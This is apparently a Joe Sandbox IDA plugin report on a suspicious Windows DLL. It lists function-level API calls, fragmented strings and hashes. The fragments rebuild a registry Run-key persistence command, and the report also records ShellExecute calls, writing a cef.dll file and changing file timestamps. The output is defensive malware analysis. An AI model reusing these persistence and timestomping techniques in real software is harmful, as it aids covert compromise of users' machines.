Sleep.KERNEL32(?,?,?,?,?,?,?,?,00000000,000000FB), ref: 10003C93
GlobalAddAtomA.KERNEL32(?), ref: 10003E64
_memset.LIBCMT ref: 10003EDD
_memset.LIBCMT ref: 10003F5A
_memset.LIBCMT ref: 10003FBD

Part of subcall function 100018EA: OpenProcess.KERNEL32(00001000,00000000,00000000), ref: 10001BCD
Part of subcall function 100018EA: OpenProcessToken.ADVAPI32(?,000F01FF,?), ref: 10001BEB
Part of subcall function 100018EA: CloseHandle.KERNEL32(?), ref: 10001BF8
Part of subcall function 100018EA: OpenProcess.KERNEL32(00001000,00000000,00000000), ref: 10001E65
Part of subcall function 100018EA: OpenProcessToken.ADVAPI32(?,000F01FF,?), ref: 10001E83
Part of subcall function 100018EA: CloseHandle.KERNEL32(?), ref: 10001E90
Part of subcall function 100018EA: OpenProcess.KERNEL32(00001000,00000000,00000000), ref: 100020FD
Part of subcall function 100018EA: OpenProcessToken.ADVAPI32(?,000F01FF,?), ref: 1000211B
Part of subcall function 100018EA: CloseHandle.KERNEL32(?), ref: 10002128

Part of subcall function 10002388: __EH_prolog3_GS.LIBCMT ref: 10002392
Part of subcall function 10002388: CoInitializeEx.COMBASE(00000000,00000000), ref: 1000239B
Part of subcall function 10002388: CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 100023AD
Part of subcall function 10002388: CoCreateInstance.COMBASE(100174F0,00000000,00000001,100172E0,?), ref: 100023C7
Part of subcall function 10002388: VariantInit.OLEAUT32(?), ref: 100023D4
Part of subcall function 10002388: VariantInit.OLEAUT32(?), ref: 100023F4
Part of subcall function 10002388: VariantInit.OLEAUT32(?), ref: 10002411
Part of subcall function 10002388: VariantInit.OLEAUT32(?), ref: 1000242E

_memset.LIBCMT ref: 10004329
LoadLibraryA.KERNEL32(?,?,00000000,000000F3), ref: 10004339
_memset.LIBCMT ref: 1000437A
GetProcAddress.KERNEL32(00000000,?), ref: 1000438B
_memset.LIBCMT ref: 100043B7
ShellExecuteA.SHELL32(00000000,?,?,00000000,00000000,00000005,?,00000000,000000FA,?,?,?,?,00000000,000000F1), ref: 100043D4
Sleep.KERNEL32(000003E8,?,?,?,?,00000000,000000F1), ref: 100043E1
Sleep.KERNEL32(00000001,?,?,?,?,00000000,000000F1), ref: 100043E5

Part of subcall function 1000B46F: _doexit.LIBCMT ref: 1000B47B

RegOpenKeyExA.KERNEL32(80000001,10019800,00000000,000F003F,?), ref: 10004406
RegSetValueExA.KERNEL32(?,10019830,00000000,00000001,?,?,?,?,?,?,00000000,000000F1), ref: 10004438
RegCloseKey.KERNEL32(?,?,?,?,?,00000000,000000F1), ref: 10004444
Sleep.KERNEL32(000003E8), ref: 1000445A

Strings

dowWndClass, xrefs: 10004228
BkSha, xrefs: 10004206
0SafeMonClass, xrefs: 10003C14
roso, xrefs: 10004037
t4d., xrefs: 10003842
un" /v de, xrefs: 100040AF
dll, xrefs: 1000431E
%s.e, xrefs: 10003AB0
Shel, xrefs: 10004308
G_SZ /d ", xrefs: 100040E0
l32., xrefs: 10004313
%s%s, xrefs: 100037E5, 100037F1, 1000387E, 10003902
text/, xrefs: 10003B21
cef.dll, xrefs: 1000379B
d "HK, xrefs: 10003FED
rsion\R, xrefs: 10004098
.exe, xrefs: 10003A6B
dows\Curr, xrefs: 10004067
tmp, xrefs: 1000384D
lalala123%, xrefs: 10003B06
le:///, xrefs: 100041C4
tmp, xrefs: 100038D1
g.e, xrefs: 10003F8A
Open, xrefs: 100043A5
%s%s, xrefs: 10003A60
t5d., xrefs: 100038C6
lExe, xrefs: 1000435A
rogr, xrefs: 100036A3
6)\, xrefs: 100036CF
entVe, xrefs: 10004080
am F, xrefs: 100036AE
tmp, xrefs: 100037BB
Shel, xrefs: 1000434F
cute, xrefs: 10004365
mo /t RE, xrefs: 100040C8
(x8, xrefs: 100036C4
TWARE\Mic, xrefs: 1000401E
C:\P, xrefs: 10003698
t3d., xrefs: 100037B0
iles, xrefs: 100036B9
Q36, xrefs: 10003C04
xe, xrefs: 10003ABB
ft\Win, xrefs: 1000404E
CU\SOF, xrefs: 10004005
A, xrefs: 10004370
2.l, xrefs: 10003F27

Memory Dump Source

Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd

Similarity

API ID: _memset$Sleep$Open$Processwsprintf$Close$HandleInitVariant$FileToken_rand$CreateH_prolog3_Initialize__time64$AddressAtomDebugExecuteFindGlobalInstanceLibraryLoadOutputProcReadSecurityShellSizeStringValueWindow__mbstowcs_l_helper_doexit_mbstowcs_strcat_s
String ID: (x8$%s%s$%s%s$%s.e$.exe$0SafeMonClass$2.l$6)\$A$BkSha$C:\P$CU\SOF$G_SZ /d "$Open$Q36$Shel$Shel$TWARE\Mic$am F$cef.dll$cute$d "HK$dll$dowWndClass$dows\Curr$entVe$ft\Win$g.e$iles$l32.$lExe$lalala123%$le:///$mo /t RE$rogr$roso$rsion\R$t3d.$t4d.$t5d.$text/$tmp$tmp$tmp$un" /v de$xe
API String ID: 3410144617-526106949
Opcode ID: c005c4bdf768c1c0975766fb4753e8dca830afea233d1b36fbea20d03bb59d88
Instruction ID: 76413fe8cb11cab67de9982341d687c7d9ac36ac981408de7d88a9673e932c04
Opcode Fuzzy Hash: c005c4bdf768c1c0975766fb4753e8dca830afea233d1b36fbea20d03bb59d88
Instruction Fuzzy Hash: 2AA2CF7154C3C5AEE321DBA49845BABB7E9FFC4740F00482EF588CB291EAB1A944C757

Function 10008A7E Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 252
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__fassign.LIBCMT ref: 10008B75
_memset.LIBCMT ref: 10008BA9
_memset.LIBCMT ref: 10008BCD
_strcat_s.LIBCMT ref: 10008BE8
_sprintf.LIBCMT ref: 10008C69
_sprintf.LIBCMT ref: 10008C91
CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,?,00000000,?,?,?,?,?,?,00000010,?,00000001), ref: 10008CC7
WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,00000010,?,00000001), ref: 10008D50
SetFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000010,?,00000001), ref: 10008D9C
CloseHandle.KERNEL32(?,?,?,?,?,?,?,00000010,?,00000001), ref: 10008DA8

Strings

text.e, xrefs: 10008B8C
%s%s, xrefs: 10008C63
\, xrefs: 10008C32
:, xrefs: 10008C48

Memory Dump Source

Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd

Similarity

API ID: File$_memset_sprintf$CloseCreateHandleTimeWrite__fassign_strcat_s
String ID: %s%s$:$\$text.e
API String ID: 3001508280-2720340845
Opcode ID: a50bfc6e1e061b7c5519877364b915e0a39f5f4d63e2ac600f096e2bcca3595d
Instruction ID: 2659727ae892349c9a1cc8126b4bdf09fa2e1e525e7c16959e2080c4e1c60f4a
Opcode Fuzzy Hash: a50bfc6e1e061b7c5519877364b915e0a39f5f4d63e2ac600f096e2bcca3595d
Instruction Fuzzy Hash: A591B171D00A289BFB61CA14CC85BDABBB8FB09395F1001D6E598A7185D770AFC5CF91

Function 10002C08 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 111
filesleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 10002C47
_memset.LIBCMT ref: 10002C70
Sleep.KERNEL32(00000001), ref: 10002C90
_malloc.LIBCMT ref: 10002CCA
_memset.LIBCMT ref: 10002CF7
WriteFile.KERNEL32(?,00000000,1F400000,?,00000000), ref: 10002D0F
_free.LIBCMT ref: 10002D16
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 10002D3E
FlushFileBuffers.KERNEL32(?), ref: 10002D4A
CloseHandle.KERNEL32(?), ref: 10002D56

Strings

lib, xrefs: 10002C88
cef.dll, xrefs: 10002CA5

Memory Dump Source

Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd

Similarity

API ID: File$Write_memset$BuffersCloseCreateFlushHandleSleep_free_malloc
String ID: cef.dll$lib
API String ID: 1923221151-1944707463
Opcode ID: a0f35e02025c0e6da95ad9ae4ad25ea50aa5c817dcbb148b28132c945581ed95
Instruction ID: 54aeca7516b8b968042b0eea4134454b72480e23f4a01d4031a2aafac840d857
Opcode Fuzzy Hash: a0f35e02025c0e6da95ad9ae4ad25ea50aa5c817dcbb148b28132c945581ed95
Instruction Fuzzy Hash: 0731827190022CAFEB15DF648C85FEEBBB9FB19354F0041D5F689A6150DAB19EC18F50

Function 100028B9 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 236
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 100028FF
_memset.LIBCMT ref: 10002911
_memset.LIBCMT ref: 10002920
_memset.LIBCMT ref: 10002B15
CreateFileA.KERNEL32(?,C0000000,00000001,00000000,00000004,00000001,00000000), ref: 10002BBF
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 10002BE6
FlushFileBuffers.KERNEL32(00000005), ref: 10002BF2
CloseHandle.KERNEL32(00000005), ref: 10002BFE

Strings

<, xrefs: 100029A7

Memory Dump Source

Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd

Similarity

API ID: _memset$File$BuffersCloseCreateFlushHandleWrite
String ID: <
API String ID: 2144675991-4251816714
Opcode ID: fc8d75bdc938032357b43d1f96daf97680519e251c9822e42b45c95b1a30f2ff
Instruction ID: 89ec0f64cc6022f2ef4fce1017900847434db0f7d38f987f34c33e9451b14973
Opcode Fuzzy Hash: fc8d75bdc938032357b43d1f96daf97680519e251c9822e42b45c95b1a30f2ff
Instruction Fuzzy Hash: F591A775900228AFEB219F64CC859EABBFDFB09395F14C1EAF509A2150DB319F858F50

Function 10008930 Relevance: 10.6, APIs: 7, Instructions: 114
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesA.KERNEL32(?,?,0000000D,?), ref: 10008995
CreateDirectoryA.KERNEL32(?,00000000,?,0000000D,?), ref: 100089A9
__fassign.LIBCMT ref: 1000895C

Part of subcall function 1000B61B: __mbsnbcpy_l.LIBCMT ref: 1000B62B

__fassign.LIBCMT ref: 10008A14
__fassign.LIBCMT ref: 10008A43
GetFileAttributesA.KERNEL32(00000000,?,0000000D,?), ref: 10008A56
CreateDirectoryA.KERNEL32(00000000,00000000,?,0000000D,?), ref: 10008A6A

Memory Dump Source

Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd

Similarity

API ID: __fassign$AttributesCreateDirectoryFile$__mbsnbcpy_l
String ID:
API String ID: 2854908881-0
Opcode ID: 8b52cf0d2e92c66932e7fabede449ccba689fc108993b223d212572b34f61b1a
Instruction ID: 91c1e80bd56abd845fcbfb77fb78178165a6c206ea0fcbd970bcf73cc3f8dc49
Opcode Fuzzy Hash: 8b52cf0d2e92c66932e7fabede449ccba689fc108993b223d212572b34f61b1a
Instruction Fuzzy Hash: 56410B755042489AFB00DB68CC88BE977EDFB05380F5801E5E5D4D3186DB719F88CB52

Function 10009824 Relevance: 9.3, APIs: 6, Instructions: 301
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3_GS.LIBCMT ref: 1000982E
wsprintfA.USER32 ref: 100098BD
wsprintfA.USER32 ref: 10009BE0

Part of subcall function 10008352: __fassign.LIBCMT ref: 10008365

_wprintf.LIBCMT ref: 1000995C
std::_Xinvalid_argument.LIBCPMT ref: 10009BBC
OutputDebugStringA.KERNEL32(?,?,?,?,?,?,10016B40,000000FF), ref: 10009BF6

Memory Dump Source

Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd

Similarity

API ID: wsprintf$DebugH_prolog3_OutputStringXinvalid_argument__fassign_wprintfstd::_
String ID:
API String ID: 2279894289-0
Opcode ID: 685f7fc147ffba85f4603d794481bf76331ea8b2d64d54bdca5866434efdc101
Instruction ID: 622278a19ea4e0f23fdf8b31d223e814ca222b5bb078937c9ab139d7dbdd0e1d
Opcode Fuzzy Hash: 685f7fc147ffba85f4603d794481bf76331ea8b2d64d54bdca5866434efdc101
Instruction Fuzzy Hash: 1EC15975D002699BEF22CFA4CC81ADDB7B8EF05390F5041AAE949A7245DB30AF85CF51

Function 10002D6B Relevance: 6.1, APIs: 4, Instructions: 68
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 10002D87
GetFileSize.KERNEL32(00000000,00000000), ref: 10002D92

Part of subcall function 1000A25F: _malloc.LIBCMT ref: 1000B4E2

ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 10002DAD
CloseHandle.KERNEL32(?), ref: 10002DCC

Memory Dump Source

Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd

Similarity

API ID: File$CloseCreateHandleReadSize_malloc
String ID:
API String ID: 1369180008-0
Opcode ID: d86be2d11198bb8b3d3548a2baccd8740581441c81fff3067ac5a97e511b0495
Instruction ID: b6e065022b967105a3a6c677f7e07d96cb23a3d5ec31f6699da48e5f37e9fbfa
Opcode Fuzzy Hash: d86be2d11198bb8b3d3548a2baccd8740581441c81fff3067ac5a97e511b0495
Instruction Fuzzy Hash: 8A11A575500224BAFB11AB71CC89EEF3F6DFF456D0F004125F909A6056DA70AD50C6F0

Function 1000B4C8 Relevance: 6.0, APIs: 4, Instructions: 41
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_malloc.LIBCMT ref: 1000B4E2

Part of subcall function 1000AC8B: __FF_MSGBANNER.LIBCMT ref: 1000ACA4
Part of subcall function 1000AC8B: __NMSG_WRITE.LIBCMT ref: 1000ACAB
Part of subcall function 1000AC8B: RtlAllocateHeap.NTDLL(00000000,00000001,00000001), ref: 1000ACD0

std::exception::exception.LIBCMT ref: 1000B517
std::exception::exception.LIBCMT ref: 1000B531
__CxxThrowException@8.LIBCMT ref: 1000B542

Memory Dump Source

Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd

Similarity

API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
String ID:
API String ID: 615853336-0
Opcode ID: fed967542a08c0061ac2f05d02469dd67cfdd1ec288f06afea94a4534caab2f9
Instruction ID: a75e7fbd331fdb54b571f695bf5094c90e00ed0fd4663d813d0828e10929f906
Opcode Fuzzy Hash: fed967542a08c0061ac2f05d02469dd67cfdd1ec288f06afea94a4534caab2f9
Instruction Fuzzy Hash: 01F02835400759ABFB50DF54CC46EAD3BBAFB013D0F60015AF815AA096CF74DE868740

Function 10007E91 Relevance: 4.6, APIs: 3, Instructions: 127
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_malloc.LIBCMT ref: 10007EDD

Part of subcall function 1000AC8B: __FF_MSGBANNER.LIBCMT ref: 1000ACA4
Part of subcall function 1000AC8B: __NMSG_WRITE.LIBCMT ref: 1000ACAB
Part of subcall function 1000AC8B: RtlAllocateHeap.NTDLL(00000000,00000001,00000001), ref: 1000ACD0

_malloc.LIBCMT ref: 10007EEE
_free.LIBCMT ref: 10007F0A

Part of subcall function 1000AC51: HeapFree.KERNEL32(00000000,00000000,?,1000A824,?,?,1000101C), ref: 1000AC67
Part of subcall function 1000AC51: GetLastError.KERNEL32(1000E0E6,?,1000EF73,00000000,1001C310,0000000C,1000EFAD,1000E0E6,?), ref: 1000AC79

Memory Dump Source

Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd

Similarity

API ID: Heap_malloc$AllocateErrorFreeLast_free
String ID:
API String ID: 916394080-0
Opcode ID: 60b11c1cfe0fbb3405eef0f7a633403ef12bcde8c2e364a545f5c540641d3538
Instruction ID: 5c4abcf3b0273c4115ce77ce56a80b6181141dfd5b40fb2f3c57c33d422fee36
Opcode Fuzzy Hash: 60b11c1cfe0fbb3405eef0f7a633403ef12bcde8c2e364a545f5c540641d3538
Instruction Fuzzy Hash: CB419C75A05656EFEB45CF68C4809A9BBF8FF08790B1001AAE858CB74AD734F950CBD0

Function 10007777 Relevance: 4.6, APIs: 3, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 100075D8: SetFilePointer.KERNEL32(FA83E855,00000000,00000000,00000002,1000778E,?,00000000,?,?,?,100078E5,?,00000140,00000000,00000000), ref: 10007604

SetFilePointer.KERNEL32(FA83E855,00000000,00000000,00000001,?,00000000,?,?,?,100078E5,?,00000140,00000000,00000000), ref: 100077AF
_malloc.LIBCMT ref: 100077DF

Memory Dump Source

Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd

Similarity

API ID: FilePointer$_malloc
String ID:
API String ID: 3040784002-0
Opcode ID: 28e1fefcf659a16470e03273281f6f5609ee5f1abf9c06588519510a91d29f85
Instruction ID: 1313e7d9f5820cc7ab2e201ac5c5f020cab07999e36477c17eb6c123f5e17d05
Opcode Fuzzy Hash: 28e1fefcf659a16470e03273281f6f5609ee5f1abf9c06588519510a91d29f85
Instruction Fuzzy Hash: 0B41A271E44246ABFB10DA68C848B9DBBF1FF043D4F25C169E909E7289EB78D940CB41

Function 1000752C Relevance: 4.6, APIs: 3, Instructions: 60
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,00000000,00000141,00000141,?,10008324,?,?), ref: 1000754D
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,00000140,?,10008E1B,?,00000004,10009892,?,?,00000334,10003B85,?), ref: 10007571
SetFilePointer.KERNEL32(?,00000000,00000000,00000001,00000020,?,10008E1B,?,00000004,10009892,?,?,00000334,10003B85,?), ref: 100075A6

Memory Dump Source

Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd

Similarity

API ID: File$Pointer$Create
String ID:
API String ID: 250661774-0
Opcode ID: 937e745b7458db1d1c02225848fbd8e50125f5581100b2d9b8b04083533d578e
Instruction ID: b1a7f2e70109716a175c2d37c51be133c3c27d8d5b2c45801dce53fe0fcebab3
Opcode Fuzzy Hash: 937e745b7458db1d1c02225848fbd8e50125f5581100b2d9b8b04083533d578e
Instruction Fuzzy Hash: 55118671544748BEE7118F78CC81B9ABBECEF057A4F10895DF599A72C1D2B5AD408B20

Function 100078A8 Relevance: 3.1, APIs: 2, Instructions: 135
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 100078D7

Memory Dump Source

Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd

Similarity

API ID: _memset
String ID:
API String ID: 2102423945-0
Opcode ID: c504ed737480372117f61c375401454e1a4cc081b0438ba395dd6110235c3eba
Instruction ID: d92c82a17bc2e3b55bf21d4e176e2411c74b9e9c773a553120c634e964016fd1
Opcode Fuzzy Hash: c504ed737480372117f61c375401454e1a4cc081b0438ba395dd6110235c3eba
Instruction Fuzzy Hash: 1A419435E0021F9BEB20DF68C88169D7BB1FF413E4F21416AE41DA7199D774AE85CB90

Function 1000B217 Relevance: 3.0, APIs: 2, Instructions: 8
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___crtCorExitProcess.LIBCMT ref: 1000B21F

Part of subcall function 1000B1EC: GetModuleHandleW.KERNEL32(100175B8,?,1000B224,1000E0E6,?,1000ACBA,000000FF,0000001E,00000001,00000000,00000000,?,1000F7D4,1000E0E6,00000001,1000E0E6), ref: 1000B1F6
Part of subcall function 1000B1EC: GetProcAddress.KERNEL32(00000000,100175A8), ref: 1000B206

ExitProcess.KERNEL32 ref: 1000B228

Memory Dump Source

Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd

Similarity

API ID: ExitProcess$AddressHandleModuleProc___crt
String ID:
API String ID: 2427264223-0
Opcode ID: 8be31fcdb33e2a27a179cff57672a67dc051748436262174480e8daa6fc77075
Instruction ID: 0c398691cb2c61e119b2037d3b9694a9f1a6bd54b2035d192df400d143da81c5
Opcode Fuzzy Hash: 8be31fcdb33e2a27a179cff57672a67dc051748436262174480e8daa6fc77075
Instruction Fuzzy Hash: A3B09231000108BBEB052F66CC0E88A3F2AFB823A0B508020F81809131DF72EE92DAC0

Function 100082D0 Relevance: 1.5, APIs: 1, Instructions: 48
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryA.KERNEL32(00000103,00000140,000000FE,?,10008E1B,?,00000004,10009892,?,?,00000334,10003B85,?), ref: 100082EB

Memory Dump Source

Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: 029ce26c42503f411c6da66abf63d6902ae0843b81772625349de17e0df78806
Instruction ID: 2bd18c3c5c48994b0759f2170f5e03fd91e5a32878fdb19b6ee32b226c9c7334
Opcode Fuzzy Hash: 029ce26c42503f411c6da66abf63d6902ae0843b81772625349de17e0df78806
Instruction Fuzzy Hash: EA01BC32500B46DAF721CA24C819BDA37E5FB81BE0F504139E6D98B2A6DB34EB49C754

Function 100075D8 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(FA83E855,00000000,00000000,00000002,1000778E,?,00000000,?,?,?,100078E5,?,00000140,00000000,00000000), ref: 10007604

Memory Dump Source

Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 8cd482582f1ce7a99dd7b2103359b883ceae031772ed6ae8337ac228d584bfe8
Instruction ID: e16feed323ec4c7c274b6ef0c638263ac2504f4610d025434aa4a630ed971512
Opcode Fuzzy Hash: 8cd482582f1ce7a99dd7b2103359b883ceae031772ed6ae8337ac228d584bfe8
Instruction Fuzzy Hash: 6AF049B0C168D29EFB3CCB0C8814CA9AA95FB513D1B1784AAF40E5B019DA168D40DED0

Function 10007637 Relevance: 1.5, APIs: 1, Instructions: 40fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(FA83E855,?,00000001,00000001,00000000,?,?,1000784E,?,00000404,00000001,00000000,?,00000000), ref: 10007654

Memory Dump Source

Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: a22246be6a0a317918d3aec1459a55e227aa439c2a33235ff47fabf9bc56f2fd
Instruction ID: 328655b20b46c7854057dbc1cba60e0a6219c51e05292851d0bcd8ded7bd93b6
Opcode Fuzzy Hash: a22246be6a0a317918d3aec1459a55e227aa439c2a33235ff47fabf9bc56f2fd
Instruction Fuzzy Hash: EB01AD72600606AFE720CE19CC40A9ABBFAFB90284F018529F88AC6650D732FD55CB50

Function 10008DDD Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 10008DE4

Part of subcall function 1000B4C8: _malloc.LIBCMT ref: 1000B4E2

Part of subcall function 1000B4C8: std::exception::exception.LIBCMT ref: 1000B517
Part of subcall function 1000B4C8: std::exception::exception.LIBCMT ref: 1000B531
Part of subcall function 1000B4C8: __CxxThrowException@8.LIBCMT ref: 1000B542

Memory Dump Source

Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd

Similarity

API ID: std::exception::exception$Exception@8H_prolog3Throw_malloc
String ID:
API String ID: 2311266369-0
Opcode ID: 3e26b86e5b1279afbabf400b168812a23bb727ffa361dbb07856a53d066e0e6f
Instruction ID: 74ea03d92b69d70e6f829631c4c0e15115dc5039482fcea8e7a8f5e451d479b6
Opcode Fuzzy Hash: 3e26b86e5b1279afbabf400b168812a23bb727ffa361dbb07856a53d066e0e6f
Instruction Fuzzy Hash: 5AF09035902A659AFB51DFA0D80675D3AA0FF00BF0F518604F8C8AF2DADBB09F408791

Function 1000A25F Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 1000B4E2

Part of subcall function 1000AC8B: __FF_MSGBANNER.LIBCMT ref: 1000ACA4
Part of subcall function 1000AC8B: __NMSG_WRITE.LIBCMT ref: 1000ACAB
Part of subcall function 1000AC8B: RtlAllocateHeap.NTDLL(00000000,00000001,00000001), ref: 1000ACD0

Memory Dump Source

Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd

Similarity

API ID: AllocateHeap_malloc
String ID:
API String ID: 501242067-0
Opcode ID: a523410b075b2e507e2f936f435e68be10a21365df9e364fe8a36f9bc3a6ea08
Instruction ID: af73953911b8e8f7bba65e66bbeb0c349d045db87309e00b0f615e81207c2e39
Opcode Fuzzy Hash: a523410b075b2e507e2f936f435e68be10a21365df9e364fe8a36f9bc3a6ea08
Instruction Fuzzy Hash: 34C02221004A08233630A81A980682A3B8CC7C24E07610010EC040208BDC50ED1280E1

Function 1000B46F Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

_doexit.LIBCMT ref: 1000B47B

Part of subcall function 1000B32F: __lock.LIBCMT ref: 1000B33D

Memory Dump Source

Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd

Similarity

API ID: __lock_doexit
String ID:
API String ID: 368792745-0
Opcode ID: b7f9ddcf0c01e83a82a0f1c6c29853ea6c7db7599a0eb0d3eddd439c3244ce42
Instruction ID: 3811ae51bb16a7fbefe7461ba190c25b745f10d60d0fc6846b8c26432b0ebc89
Opcode Fuzzy Hash: b7f9ddcf0c01e83a82a0f1c6c29853ea6c7db7599a0eb0d3eddd439c3244ce42
Instruction Fuzzy Hash: 6DB0123258030C33EA201E42EC03F163F1DC7C0BA0F740020FA0C1D2E1A9A3BA6190C9

Function 10007072 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

_calloc.LIBCMT ref: 1000707B

Memory Dump Source

Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd

Similarity

API ID: _calloc
String ID:
API String ID: 1679841372-0
Opcode ID: 6fbe30c6f210a50f799fcab12581603f26f4a8b3ac0063225e078c4a9166d02b
Instruction ID: c8d80f786f7d054e37de60efd03ea03daa2671600acf41333a91e997b5ba6f52
Opcode Fuzzy Hash: 6fbe30c6f210a50f799fcab12581603f26f4a8b3ac0063225e078c4a9166d02b
